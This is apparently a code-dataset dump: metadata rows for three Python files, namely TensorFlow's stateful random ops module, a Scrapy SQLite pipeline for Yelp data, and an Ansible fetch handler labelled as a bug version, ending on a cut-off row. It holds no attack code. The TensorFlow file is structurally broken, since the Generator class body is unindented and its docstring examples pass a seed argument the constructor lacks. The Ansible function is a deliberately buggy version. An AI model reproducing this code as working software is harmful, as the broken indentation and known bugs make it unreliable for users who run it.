b302b13d664f632886e2fab3aed08f727a416d21 | 81e706b69c789aff05691c41fa79156942927f82 | /site-packages/tensorflow/python/ops/stateful_random_ops.py | d27c20ca03006d7837c891f41ea4f308918b8e56 | [] | no_license | yoncho/OpenCV-code | f5a1091ef32f3c8c3254ab93e083950b84c4fabd | bda2f793b11462e67c7ab644b342beffb871e3de | refs/heads/master | 2023-03-30T12:01:23.521511 | 2021-04-01T13:45:44 | 2021-04-01T13:45:44 | 291,398,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,862 | py | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Operations for generating random numbers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_stateful_random_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.training.tracking import tracking
from tensorflow.python.util.tf_export import tf_export
# A seed for random ops (stateful and stateless) will always be 1024
# bits, all of which will be sent to the C++ code. The actual C++
# implementation of some algorithms may only use a lower part of the bits.

MAX_INT64 = 2**63 - 1
MIN_INT64 = -(2**63)
UINT64_SPAN = 2**64
# 'Variable' doesn't support uint32 or uint64 yet (due to reasons explained in
# b/111604096 and cl/171681867), so I use signed int here. I choose int64
# instead of int32 here because `VarHandleOp` doesn't support int32 on GPU.
SEED_TYPE = "int64"
SEED_MIN = MIN_INT64
SEED_MAX = MAX_INT64
SEED_UINT_SPAN = UINT64_SPAN
SEED_TYPE_BITS = 64
SEED_BIT_MASK = 0xFFFFFFFFFFFFFFFF
SEED_SIZE = 16  # in units of SEED_TYPE

# RNG state is stored in the same signed-int64 representation as seeds.
STATE_TYPE = SEED_TYPE
ALGORITHM_TYPE = STATE_TYPE
RNG_ALG_PHILOX = 1
RNG_ALG_THREEFRY = 2
DEFAULT_ALGORITHM = RNG_ALG_PHILOX

# State lengths in units of STATE_TYPE (counter words followed by the key).
PHILOX_STATE_SIZE = 3
THREEFRY_STATE_SIZE = 2
def non_deterministic_ints(shape, dtype=dtypes.int64):
  """Non-deterministically generates some integers.

  This op may use some OS-provided source of non-determinism (e.g. an RNG), so
  each execution will give different results.

  Args:
    shape: the shape of the result.
    dtype: (optional) the dtype of the result.

  Returns:
    a tensor whose element values are non-deterministically chosen.
  """
  # Thin wrapper over the generated kernel binding.
  return gen_stateful_random_ops.non_deterministic_ints(
      shape=shape, dtype=dtype)
def _uint_to_int(n):
  """Reinterprets a uint64-range Python int as its signed int64 value."""
  # Values above SEED_MAX wrap into the negative two's-complement range.
  return n - SEED_UINT_SPAN if n > SEED_MAX else n
def _make_1d_state(state_size, seed):
  """Makes a 1-D RNG state.

  Args:
    state_size: an integer.
    seed: an integer or 1-D tensor.

  Returns:
    a 1-D tensor of shape [state_size] and dtype STATE_TYPE.
  """
  # `long` only exists on Python 2; the tuple is chosen per interpreter.
  int_types = (int,) if sys.version_info >= (3, 0) else (int, long)
  if isinstance(seed, int_types):
    # chop the Python integer (infinite precision) into chunks of SEED_TYPE
    ls = []
    for _ in range(state_size):
      ls.append(seed & SEED_BIT_MASK)
      seed >>= SEED_TYPE_BITS
    seed = ls
  # to avoid overflow error from np.asarray
  seed = list(map(_uint_to_int, seed))
  seed = np.asarray(seed, dtype=STATE_TYPE)
  if len(seed.shape) != 1:
    raise ValueError(
        "seed should only have one dimension; got shape: %s" % seed.shape)
  # Truncate an over-long seed to the algorithm's state size.
  seed = seed[0:state_size]
  # Padding with zeros on the *left* if too short. Padding on the right would
  # cause a small seed to be used as the "counter" while the "key" is always
  # zero (for counter-based RNG algorithms), because in the current memory
  # layout counter is stored before key. In such a situation two RNGs with
  # two different small seeds may generate overlapping outputs.
  seed_size = seed.shape[0]
  if seed_size < state_size:
    seed = np.pad(
        seed, [(state_size - seed_size, 0)],
        mode="constant",
        constant_values=0)
  assert seed.shape == (state_size,), "Wrong seed.shape: %s" % seed.shape
  return seed
def _get_state_size(alg):
  """Returns the state length (in units of STATE_TYPE) for algorithm `alg`."""
  if alg == RNG_ALG_THREEFRY:
    return THREEFRY_STATE_SIZE
  if alg == RNG_ALG_PHILOX:
    return PHILOX_STATE_SIZE
  raise ValueError("Unsupported algorithm id: %s" % alg)
def _make_state_from_seed(seed, alg):
  """Converts a seed into a 1-D state vector sized for algorithm `alg`."""
  return _make_1d_state(_get_state_size(alg), seed)
@tf_export("random.experimental.create_rng_state")
def create_rng_state(seed, algorithm):
  """Creates a RNG state.

  Args:
    seed: an integer or 1-D tensor.
    algorithm: an integer representing the RNG algorithm.

  Returns:
    a 1-D tensor whose size depends on the algorithm.
  """
  # Public alias of the internal seed-to-state conversion.
  return _make_state_from_seed(seed, algorithm)
def _shape_tensor(shape):
  """Convert to an int32 or int64 tensor, defaulting to int64 if empty."""
  # An empty Python sequence carries no dtype information, so pin it to
  # int64; otherwise let convert_to_tensor infer the dtype.
  is_empty_sequence = isinstance(shape, (tuple, list)) and not shape
  dtype = dtypes.int64 if is_empty_sequence else None
  return ops.convert_to_tensor(shape, dtype=dtype, name="shape")
def _convert_to_state_tensor(t):
  """Converts `t` to a STATE_TYPE tensor, mapping uint64-range Python ints
  in a list to their signed-int64 representation first."""
  if isinstance(t, list):
    # to avoid out-of-range error from ops.convert_to_tensor
    t = list(map(_uint_to_int, t))
  return ops.convert_to_tensor(t, dtype=STATE_TYPE)
@tf_export("random.experimental.Generator")
class Generator(tracking.AutoTrackable):
"""Random-number generator.
It uses Variable to manage its internal state, and allows choosing an
Random-Number-Generation (RNG) algorithm.
CPU, GPU and TPU with the same algorithm and seed will generate the same
integer random numbers. Float-point results (such as the output of `normal`)
may have small numerical discrepancies between CPU and GPU.
"""
def __init__(self, copy_from=None, state=None, alg=None):
  """Creates a generator.

  The new generator will be initialized by one of the following ways, with
  decreasing precedence:
  (1) If `copy_from` is not None, the new generator is initialized by copying
      information from another generator.
  (2) If `state` and `alg` are not None (they must be set together), the new
      generator is initialized by a state.

  Args:
    copy_from: a generator to be copied from.
    state: a vector of dtype STATE_TYPE representing the initial state of the
      RNG, whose length and semantics are algorithm-specific.
    alg: the RNG algorithm. Possible values are RNG_ALG_PHILOX for the
      Philox algorithm and RNG_ALG_THREEFRY for the ThreeFry
      algorithm (see paper 'Parallel Random Numbers: As Easy as 1, 2, 3'
      [https://www.thesalmons.org/john/random123/papers/random123sc11.pdf]).
  """
  if copy_from is not None:
    # All other arguments should be None
    assert (alg or state) is None
    # The state lives in a non-trainable Variable so ops can update it.
    self._state_var = variables.Variable(copy_from.state, dtype=STATE_TYPE,
                                         trainable=False)
    self._alg_var = copy_from.algorithm
  else:
    assert alg is not None and state is not None
    state = _convert_to_state_tensor(state)
    # Fail early if the state length doesn't match the chosen algorithm.
    state.shape.assert_is_compatible_with([_get_state_size(alg)])
    self._state_var = variables.Variable(state, dtype=STATE_TYPE,
                                         trainable=False)
    self._alg_var = alg
@classmethod
def from_state(cls, state, alg):
  """Creates a generator from a state.

  See `__init__` for description of `state` and `alg`.

  Args:
    state: the new state.
    alg: the RNG algorithm.

  Returns:
    The new generator.
  """
  # Alternate constructor; simply forwards to __init__.
  return cls(alg=alg, state=state)
@classmethod
def from_seed(cls, seed, alg=None):
  """Creates a generator from a seed.

  A seed is a 1024-bit unsigned integer represented either as a Python
  integer or a vector of integers. Seeds shorter than 1024-bit will be
  padded. The padding, the internal structure of a seed and the way a seed
  is converted to a state are all opaque (unspecified). The only semantics
  specification of seeds is that two different seeds are likely to produce
  two independent generators (but no guarantee).

  Args:
    seed: the seed for the RNG.
    alg: (optional) the RNG algorithm. If None, it will be auto-selected. See
      `__init__` for its possible values.

  Returns:
    The new generator.
  """
  if alg is None:
    # TODO(wangpeng): more sophisticated algorithm selection
    alg = DEFAULT_ALGORITHM
  # Deterministic: the same seed always yields the same initial state.
  state = create_rng_state(seed, alg)
  return cls(state=state, alg=alg)
@classmethod
def from_non_deterministic_state(cls, alg=None):
  """Creates a generator by non-deterministically initializing its state.

  The source of the non-determinism will be platform- and time-dependent.

  Args:
    alg: (optional) the RNG algorithm. If None, it will be auto-selected. See
      `__init__` for its possible values.

  Returns:
    The new generator.
  """
  if alg is None:
    # TODO(wangpeng): more sophisticated algorithm selection
    alg = DEFAULT_ALGORITHM
  # Each call produces a fresh, unpredictable state.
  state = non_deterministic_ints(shape=[_get_state_size(alg)],
                                 dtype=SEED_TYPE)
  return cls(state=state, alg=alg)
@classmethod
def from_key_counter(cls, key, counter, alg):
  """Builds a generator from a key and a counter.

  Only applicable to counter-based algorithms. See the `key` property for
  the meaning of "key" and "counter".

  Args:
    key: the key for the RNG, a scalar of type STATE_TYPE.
    counter: a vector of dtype STATE_TYPE holding the initial counter; its
      length is algorithm-specific.
    alg: the RNG algorithm. See `__init__` for its possible values.

  Returns:
    The new generator.
  """
  counter_t = _convert_to_state_tensor(counter)
  key_t = _convert_to_state_tensor(key)
  # The state layout is [counter..., key]; validate both pieces first.
  counter_t.shape.assert_is_compatible_with([_get_state_size(alg) - 1])
  key_t.shape.assert_is_compatible_with([])
  full_state = array_ops.concat(
      [counter_t, array_ops.reshape(key_t, [1])], 0)
  return cls(state=full_state, alg=alg)
def reset(self, state):
  """Resets the generator to a new state.

  See `__init__` for the meaning of "state".

  Args:
    state: the new state.
  """
  new_state = _convert_to_state_tensor(state)
  new_state.shape.assert_is_compatible_with(
      [_get_state_size(self.algorithm)])
  self._state_var.assign(new_state)
def reset_from_seed(self, seed):
  """Resets the generator from a new seed.

  See `from_seed` for the meaning of "seed".

  Args:
    seed: the new seed.
  """
  self._state_var.assign(create_rng_state(seed, self.algorithm))
def reset_from_key_counter(self, key, counter):
  """Resets the generator from a new key-counter pair.

  See `from_key_counter` for the meaning of "key" and "counter".

  Args:
    key: the new key.
    counter: the new counter.
  """
  counter_t = _convert_to_state_tensor(counter)
  key_t = _convert_to_state_tensor(key)
  counter_t.shape.assert_is_compatible_with(
      [_get_state_size(self.algorithm) - 1])
  key_t.shape.assert_is_compatible_with([])
  # Rebuild the [counter..., key] state vector and overwrite the variable.
  new_state = array_ops.concat(
      [counter_t, array_ops.reshape(key_t, [1])], 0)
  self._state_var.assign(new_state)
@property
def state(self):
  """The internal state of the RNG (the backing variable)."""
  return self._state_var
@property
def algorithm(self):
  """The RNG algorithm id (e.g. RNG_ALG_PHILOX or RNG_ALG_THREEFRY)."""
  return self._alg_var
def _standard_normal(self, shape, dtype):
  # Draws standard-normal samples via the stateful kernel; advances
  # `self.state` as a side effect.
  return gen_stateful_random_ops.stateful_standard_normal_v2(
      self.state.handle, self.algorithm, shape, dtype=dtype)
@property
def key(self):
  """The 'key' part of the state of a counter-based RNG.

  For a counter-based RNG algorithm such as Philox and ThreeFry (as
  described in paper 'Parallel Random Numbers: As Easy as 1, 2, 3'
  [https://www.thesalmons.org/john/random123/papers/random123sc11.pdf]),
  the state consists of a counter and a key, and the output is
  output=hash(key, counter). Two RNGs with different keys can be viewed
  as two independent random-number streams (a stream is formed by
  increasing the counter).

  Returns:
    A scalar holding the 'key' part of the state, if the RNG algorithm is
    counter-based; otherwise a ValueError is raised.
  """
  if self.algorithm in (RNG_ALG_PHILOX, RNG_ALG_THREEFRY):
    # The key is stored as the last element of the state vector.
    return self._state_var[-1]
  raise ValueError("Unsupported algorithm id: %s" % self.algorithm)
def skip(self, delta):
  """Advances the counter of a counter-based RNG.

  Args:
    delta: the amount of advancement. The state of the RNG after
      `skip(n)` will be the same as that after `normal([n])`
      (or any other distribution). The actual increment added to the
      counter is an unspecified implementation detail.
  """
  # Mutates the state variable in place through its resource handle.
  gen_stateful_random_ops.rng_skip(self.state.handle, self.algorithm, delta)
# The following functions return a tensor and as a side effect update
# self._state_var.
def normal(self, shape, mean=0.0, stddev=1.0, dtype=dtypes.float32,
           name=None):
  """Outputs random values from a normal distribution.

  Args:
    shape: A 1-D integer Tensor or Python array. The shape of the output
      tensor.
    mean: A 0-D Tensor or Python value of type `dtype`. The mean of the
      normal distribution.
    stddev: A 0-D Tensor or Python value of type `dtype`. The standard
      deviation of the normal distribution.
    dtype: The type of the output.
    name: A name for the operation (optional).

  Returns:
    A tensor of the specified shape filled with random normal values.
  """
  with ops.name_scope(name, "stateful_normal", [shape, mean, stddev]) as name:
    shape_t = _shape_tensor(shape)
    mean_t = ops.convert_to_tensor(mean, dtype=dtype, name="mean")
    stddev_t = ops.convert_to_tensor(stddev, dtype=dtype, name="stddev")
    # Scale and shift standard-normal samples to the requested distribution.
    sample = self._standard_normal(shape_t, dtype=dtype)
    return math_ops.add(sample * stddev_t, mean_t, name=name)
def _truncated_normal(self, shape, dtype):
  # Draws truncated standard-normal samples via the stateful kernel;
  # advances `self.state` as a side effect.
  return gen_stateful_random_ops.stateful_truncated_normal(
      self.state.handle, self.algorithm, shape, dtype=dtype)
def truncated_normal(self, shape,
                     mean=0.0,
                     stddev=1.0,
                     dtype=dtypes.float32,
                     name=None):
  """Outputs random values from a truncated normal distribution.

  Samples follow a normal distribution with the given mean and standard
  deviation, except that values whose magnitude is more than 2 standard
  deviations from the mean are dropped and re-picked.

  Args:
    shape: A 1-D integer Tensor or Python array. The shape of the output
      tensor.
    mean: A 0-D Tensor or Python value of type `dtype`. The mean of the
      truncated normal distribution.
    stddev: A 0-D Tensor or Python value of type `dtype`. The standard
      deviation of the normal distribution, before truncation.
    dtype: The type of the output.
    name: A name for the operation (optional).

  Returns:
    A tensor of the specified shape filled with random truncated normal
    values.
  """
  with ops.name_scope(
      name, "truncated_normal", [shape, mean, stddev]) as name:
    out_shape = _shape_tensor(shape)
    offset = ops.convert_to_tensor(mean, dtype=dtype, name="mean")
    scale = ops.convert_to_tensor(stddev, dtype=dtype, name="stddev")
    sample = self._truncated_normal(out_shape, dtype=dtype)
    # Scale first, then shift, naming the final op after the scope.
    return math_ops.add(sample * scale, offset, name=name)
def _uniform(self, shape, dtype):
  # Draws uniform samples via the stateful kernel; advances `self.state`
  # as a side effect.
  return gen_stateful_random_ops.stateful_uniform(
      self.state.handle, self.algorithm, shape=shape, dtype=dtype)
def uniform(self, shape, minval=0, maxval=None,
            dtype=dtypes.float32, name=None):
  """Outputs random values from a uniform distribution.

  The generated values follow a uniform distribution in the range
  `[minval, maxval)`: `minval` is included, `maxval` is excluded. (For
  floats — especially low-precision types like bfloat16 — rounding may
  occasionally produce `maxval` itself.)

  For floats the default range is `[0, 1)`. For ints, `maxval` must be
  given explicitly.

  In the integer case the random integers are slightly biased unless
  `maxval - minval` is an exact power of two; the bias is small when
  `maxval - minval` is much smaller than the output range (`2**32` or
  `2**64`).

  Args:
    shape: A 1-D integer Tensor or Python array. The shape of the output
      tensor.
    minval: A 0-D Tensor or Python value of type `dtype`. The lower bound
      (inclusive) on the range of random values. Defaults to 0.
    maxval: A 0-D Tensor or Python value of type `dtype`. The upper bound
      (exclusive) on the range of random values. Defaults to 1 if `dtype`
      is floating point.
    dtype: The type of the output.
    name: A name for the operation (optional).

  Returns:
    A tensor of the specified shape filled with random uniform values.

  Raises:
    ValueError: If `dtype` is integral and `maxval` is not specified.
  """
  dtype = dtypes.as_dtype(dtype)
  if maxval is None:
    if dtype.is_integer:
      raise ValueError("Must specify maxval for integer dtype %r" % dtype)
    maxval = 1
  with ops.name_scope(name, "stateful_uniform",
                      [shape, minval, maxval]) as name:
    shape = _shape_tensor(shape)
    minval = ops.convert_to_tensor(minval, dtype=dtype, name="min")
    maxval = ops.convert_to_tensor(maxval, dtype=dtype, name="max")
    if dtype.is_integer:
      # Integers use a dedicated kernel that samples the range directly.
      return gen_stateful_random_ops.stateful_uniform_int(
          self.state.handle, self.algorithm, shape=shape,
          minval=minval, maxval=maxval, name=name)
    # Floats: stretch [0, 1) samples onto [minval, maxval).
    rnd = self._uniform(shape=shape, dtype=dtype)
    return math_ops.add(rnd * (maxval - minval), minval, name=name)
def uniform_full_int(self, shape, dtype=dtypes.uint64, name=None):
  """Uniform distribution over an integer type's entire range.

  Unlike `uniform`, which only covers `[minval, maxval)` and therefore
  cannot reach `dtype`'s full range (since `maxval` is itself of type
  `dtype`), this method covers every representable value.

  Args:
    shape: the shape of the output.
    dtype: (optional) the integer type, default to uint64.
    name: (optional) the name of the node.

  Returns:
    A tensor of random numbers of the required shape.
  """
  dtype = dtypes.as_dtype(dtype)
  with ops.name_scope(name, "stateful_uniform_full_int",
                      [shape]) as name:
    return gen_stateful_random_ops.stateful_uniform_full_int(
        self.state.handle, self.algorithm, shape=_shape_tensor(shape),
        dtype=dtype, name=name)
def binomial(self, shape, counts, probs, dtype=dtypes.int32, name=None):
  """Outputs random values from a binomial distribution.

  The generated values follow a binomial distribution with the specified
  count and probability-of-success parameters.

  Example:

  ```python
  counts = [10., 20.]
  # Probability of success.
  probs = [0.8, 0.9]
  rng = tf.random.experimental.Generator(seed=234)
  binomial_samples = rng.binomial(shape=[2], counts=counts, probs=probs)
  ```

  Args:
    shape: A 1-D integer Tensor or Python array. The shape of the output
      tensor.
    counts: A 0/1-D Tensor or Python value. The counts of the binomial
      distribution.
    probs: A 0/1-D Tensor or Python value. The probability of success for
      the binomial distribution.
    dtype: The type of the output. Default: tf.int32
    name: A name for the operation (optional).

  Returns:
    A tensor of the specified shape filled with random binomial values.
  """
  dtype = dtypes.as_dtype(dtype)
  with ops.name_scope(name, "binomial", [shape, counts, probs]) as name:
    counts_t = ops.convert_to_tensor(counts, name="counts")
    probs_t = ops.convert_to_tensor(probs, name="probs")
    return gen_stateful_random_ops.stateful_random_binomial(
        self.state.handle,
        self.algorithm,
        shape=_shape_tensor(shape),
        counts=counts_t,
        probs=probs_t,
        dtype=dtype,
        name=name)
# TODO(wangpeng): implement other distributions
def _make_int64_keys(self, shape=()):
  # New independent keys are generated via
  # `new_key[i] = hash(old_key, counter+i)`, which is exactly what
  # `uniform_full_int(dtype=int64)` does for PhiloxRandom_64_128_128 and
  # ThreeFry_64_64_64.
  return self.uniform_full_int(shape=shape, dtype=dtypes.int64)
def make_seeds(self, count=1):
  """Generates seeds for stateless random ops.

  For example:

  ```python
  seeds = get_global_generator().make_seeds(count=10)
  for i in range(10):
    seed = seeds[:, i]
    numbers = stateless_random_normal(shape=[2, 3], seed=seed)
    ...
  ```

  Args:
    count: the number of seed pairs (note that stateless random ops need a
      pair of seeds to invoke).

  Returns:
    A tensor of shape [2, count] and dtype int64.
  """
  if self.algorithm not in (RNG_ALG_PHILOX, RNG_ALG_THREEFRY):
    raise ValueError("Unsupported algorithm id: %s" % self.algorithm)
  keys = self._make_int64_keys(shape=[count])
  # The two seeds of a stateless op have no individual semantics and get
  # scrambled together, so fixing one of them to zero is fine.
  return array_ops.stack([keys, array_ops.zeros_like(keys)])
def split(self, count=1):
  """Returns a list of independent `Generator` objects.

  Two generators are independent in the sense that the random-number
  streams they generate have no statistically detectable correlations.
  The new generators are also independent of the old one. Since `split`
  advances the old generator's state (like other random-number generating
  methods), two calls of `split` return different new generators.

  For example:

  ```python
  gens = get_global_generator().split(count=10)
  for gen in gens:
    numbers = gen.normal(shape=[2, 3])
    # ...
  gens2 = get_global_generator().split(count=10)
  # gens2 will be different from gens
  ```

  The new generators are placed on the current device (possibly different
  from the old generator's), for example:

  ```python
  with tf.device("/device:CPU:0"):
    gen = Generator(seed=1234)  # gen is on CPU
  with tf.device("/device:GPU:0"):
    gens = gen.split(count=10)  # gens are on GPU
  ```

  Args:
    count: the number of generators to return.

  Returns:
    A list (length `count`) of `Generator` objects independent of each
    other. The new generators share the old one's RNG algorithm.
  """
  alg = self.algorithm
  if alg != RNG_ALG_PHILOX and alg != RNG_ALG_THREEFRY:
    raise ValueError("Unsupported algorithm id: %s" % alg)
  # Each child state is the fresh key left-padded with zeros (the zeros
  # become the counter part of the state).
  zero_counter = [0] * (_get_state_size(alg) - 1)
  keys = self._make_int64_keys(shape=[count])
  return [Generator(state=zero_counter + [key], alg=alg)
          for key in keys.numpy()]
# It's not safe to create TF ops before `init_google` is called, so this
# module-level singleton starts as None and is lazily constructed the first
# time `get_global_generator` is called.
global_generator = None
@tf_export("random.experimental.get_global_generator")
def get_global_generator():
  """Returns the global `Generator`, creating it lazily on first use.

  The first call constructs the generator from a non-deterministic state;
  use `set_global_generator` to install a reproducible one instead.

  Returns:
    The module-level singleton `Generator`.
  """
  global global_generator
  if global_generator is None:
    global_generator = Generator.from_non_deterministic_state()
  return global_generator
@tf_export("random.experimental.set_global_generator")
def set_global_generator(generator):
  """Replaces the global generator with another `Generator` object.

  This function creates a new Generator object (and the Variable object
  within), which does not work well with tf.function because (1) tf.function
  puts restrictions on Variable creation thus reset_global_generator can't be
  freely used inside tf.function; (2) redirecting a global variable to a new
  object is problematic with tf.function because the old object may be
  captured by a 'tf.function'ed function and still be used by it. A
  'tf.function'ed function only keeps weak references to variables, so
  deleting a variable and then calling that function again may raise an
  error, as demonstrated by
  random_test.py/RandomTest.testResetGlobalGeneratorBadWithDefun .

  Args:
    generator: the new `Generator` object.
  """
  global global_generator
  global_generator = generator
| [
"[email protected]"
] | |
d6e214d0a8d4d12652eee9f7bca72966d79550f4 | f9684c301ce50a6bbb5a75280cd4c70277119f27 | /yelpdetails/yelpdetails/pipelines.py | 55531cab7d87353200bd42058134f3e8878cb6be | [] | no_license | vaibhav89000/yelpdetails | 76149f2feed5cbad98b3e67d3a786223289fc1f4 | b7ce6f739a7f76fbe665e27eb097475775c0c489 | refs/heads/master | 2022-11-25T05:09:56.803075 | 2020-07-06T12:45:54 | 2020-07-06T12:45:54 | 269,969,213 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,379 | py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
import sqlite3
class YelpdetailsPipeline(object):
    """Scrapy item pipeline that persists scraped Yelp business details
    into a local SQLite database (``yelpdetails.db``).

    The table is dropped and re-created on construction, so each crawl
    starts with a clean ``detail`` table.
    """

    def __init__(self):
        # Open the database once per pipeline instance and (re)create the
        # output table.
        self.create_connection()
        self.create_table()

    def create_connection(self):
        """Connects to the SQLite file and keeps a reusable cursor."""
        self.conn = sqlite3.connect("yelpdetails.db")
        self.curr = self.conn.cursor()

    def create_table(self):
        """Drops any previous ``detail`` table and creates a fresh one."""
        self.curr.execute("""DROP TABLE IF EXISTS detail""")
        self.curr.execute("""create table detail(
            Name text,
            website_link text,
            website_name text,
            phone text,
            Direction text,
            category text,
            find text,
            near text,
            email text,
            website text
        )""")

    def process_item(self, item, spider):
        """Scrapy hook: stores one scraped item and returns it unchanged.

        Args:
            item: mapping with the keys inserted by ``store_db``.
            spider: the spider that produced the item (unused).

        Returns:
            The same ``item``, so later pipeline stages can process it.
        """
        self.store_db(item)
        return item

    def store_db(self, item):
        """Inserts a single item row and commits the transaction."""
        self.curr.execute(
            """insert into detail values (?,?,?,?,?,?,?,?,?,?)""", (
                item['Name'],
                item['website_link'],
                item['website_name'],
                item['phone'],
                item['Direction'],
                item['category'],
                item['find'],
                item['near'],
                item['email'],
                item['website']
            ))
        self.conn.commit()

    def close_spider(self, spider):
        """Scrapy hook: closes the DB connection when the spider finishes.

        Fixes a resource leak in the original pipeline, which never closed
        the connection. Scrapy calls this automatically at shutdown.
        """
        self.conn.close()
| [
"[email protected]"
] | |
a927ca2edd90ae07adf56559bbfe6b40379ae5cb | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-2/f57f33a8e73d1ac10b3eb6b4333e635c1608bc27-<run>-bug.py | 8fd0e05b5b4b4ec324c3a6a1b7cf88dccfc0d38a | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,670 | py |
def run(self, tmp=None, task_vars=None):
    """Handler for fetch operations: copies a file from the remote host
    to the controller, validating checksums along the way.

    `remote_checksum` uses sentinel string values: '0' checksum failed,
    '1' file missing, '2' no read permission, '3' is a directory,
    '4' no python on the remote; anything else is a real checksum.
    """
    if (task_vars is None):
        task_vars = dict()
    result = super(ActionModule, self).run(tmp, task_vars)
    if self._play_context.check_mode:
        result['skipped'] = True
        result['msg'] = 'check mode not (yet) supported for this module'
        return result
    # --- argument parsing and validation ---
    source = self._task.args.get('src', None)
    dest = self._task.args.get('dest', None)
    flat = boolean(self._task.args.get('flat'))
    fail_on_missing = boolean(self._task.args.get('fail_on_missing'))
    # validate_md5 is the legacy alias of validate_checksum.
    validate_checksum = boolean(self._task.args.get('validate_checksum', self._task.args.get('validate_md5')))
    if (('validate_md5' in self._task.args) and ('validate_checksum' in self._task.args)):
        result['failed'] = True
        result['msg'] = 'validate_checksum and validate_md5 cannot both be specified'
        return result
    if ((source is None) or (dest is None)):
        result['failed'] = True
        result['msg'] = 'src and dest are required'
        return result
    source = self._connection._shell.join_path(source)
    source = self._remote_expand_user(source)
    # --- obtain the remote checksum (and, if needed, the file content) ---
    remote_checksum = None
    if (not self._play_context.become):
        # Calculate checksum for the remote file; don't bother if we are
        # using become, as slurp will be used for that case anyway.
        remote_checksum = self._remote_checksum(source, all_vars=task_vars)
    remote_data = None
    if (remote_checksum in ('1', '2', None)):
        # Missing/unreadable/unknown: fall back to the slurp module, which
        # may succeed where the plain checksum could not (e.g. with become).
        slurpres = self._execute_module(module_name='slurp', module_args=dict(src=source), task_vars=task_vars, tmp=tmp)
        if slurpres.get('failed'):
            if ((not fail_on_missing) and (slurpres.get('msg').startswith('file not found') or (remote_checksum == '1'))):
                result['msg'] = 'the remote file does not exist, not transferring, ignored'
                result['file'] = source
                result['changed'] = False
            else:
                result.update(slurpres)
            return result
        else:
            if (slurpres['encoding'] == 'base64'):
                remote_data = base64.b64decode(slurpres['content'])
            if (remote_data is not None):
                remote_checksum = checksum_s(remote_data)
            # The source path may have been expanded by the slurp module.
            remote_source = slurpres.get('source')
            if (remote_source and (remote_source != source)):
                source = remote_source
    # --- compute the local destination path ---
    # If the shell's path separator check shows a Windows-style remote,
    # normalize backslashes so the local path is built consistently.
    if (os.path.sep not in self._connection._shell.join_path('a', '')):
        source = self._connection._shell._unquote(source)
        source_local = source.replace('\\', '/')
    else:
        source_local = source
    dest = os.path.expanduser(dest)
    if flat:
        if dest.endswith(os.sep):
            # If dest ends with '/', append the remote file's basename.
            base = os.path.basename(source_local)
            dest = os.path.join(dest, base)
        if (not dest.startswith('/')):
            # Relative paths are resolved against the playbook dir.
            dest = self._loader.path_dwim(dest)
    else:
        # Non-flat layout: <dest>/<hostname>/<remote path>.
        if ('inventory_hostname' in task_vars):
            target_name = task_vars['inventory_hostname']
        else:
            target_name = self._play_context.remote_addr
        dest = ('%s/%s/%s' % (self._loader.path_dwim(dest), target_name, source_local))
    dest = dest.replace('//', '/')
    # --- translate sentinel checksum values into user-facing results ---
    if (remote_checksum in ('0', '1', '2', '3', '4')):
        if (remote_checksum == '0'):
            result['msg'] = 'unable to calculate the checksum of the remote file'
            result['file'] = source
            result['changed'] = False
        elif (remote_checksum == '1'):
            if fail_on_missing:
                result['failed'] = True
                result['msg'] = 'the remote file does not exist'
                result['file'] = source
            else:
                result['msg'] = 'the remote file does not exist, not transferring, ignored'
                result['file'] = source
                result['changed'] = False
        elif (remote_checksum == '2'):
            result['msg'] = 'no read permission on remote file, not transferring, ignored'
            result['file'] = source
            result['changed'] = False
        elif (remote_checksum == '3'):
            result['msg'] = 'remote file is a directory, fetch cannot work on directories'
            result['file'] = source
            result['changed'] = False
        elif (remote_checksum == '4'):
            result['msg'] = "python isn't present on the system. Unable to compute checksum"
            result['file'] = source
            result['changed'] = False
        return result
    # --- transfer only when local and remote checksums differ ---
    local_checksum = checksum(dest)
    if (remote_checksum != local_checksum):
        makedirs_safe(os.path.dirname(dest))
        if (remote_data is None):
            # Content not already slurped: stream the file directly.
            self._connection.fetch_file(source, dest)
        else:
            try:
                f = open(to_bytes(dest, errors='strict'), 'w')
                f.write(remote_data)
                f.close()
            except (IOError, OSError) as e:
                raise AnsibleError(('Failed to fetch the file: %s' % e))
        new_checksum = secure_hash(dest)
        # md5() raises ValueError on FIPS-restricted systems; report None then.
        try:
            new_md5 = md5(dest)
        except ValueError:
            new_md5 = None
        if (validate_checksum and (new_checksum != remote_checksum)):
            result.update(dict(failed=True, md5sum=new_md5, msg='checksum mismatch', file=source, dest=dest, remote_md5sum=None, checksum=new_checksum, remote_checksum=remote_checksum))
        else:
            result.update(dict(changed=True, md5sum=new_md5, dest=dest, remote_md5sum=None, checksum=new_checksum, remote_checksum=remote_checksum))
    else:
        # File already up to date locally; report unchanged.
        try:
            local_md5 = md5(dest)
        except ValueError:
            local_md5 = None
        result.update(dict(changed=False, md5sum=local_md5, file=source, dest=dest, checksum=local_checksum))
    return result
| [
"[email protected]"
] | |
d63e37f24e963205d5ab81509b9fb9b544d6dc56 | 0b01cb61a4ae4ae236a354cbfa23064e9057e434 | /alipay/aop/api/domain/InvoiceQueryOpenModel.py | e4a1f2eb763c0a192adc00a055403a1ea79f277d | [
"Apache-2.0"
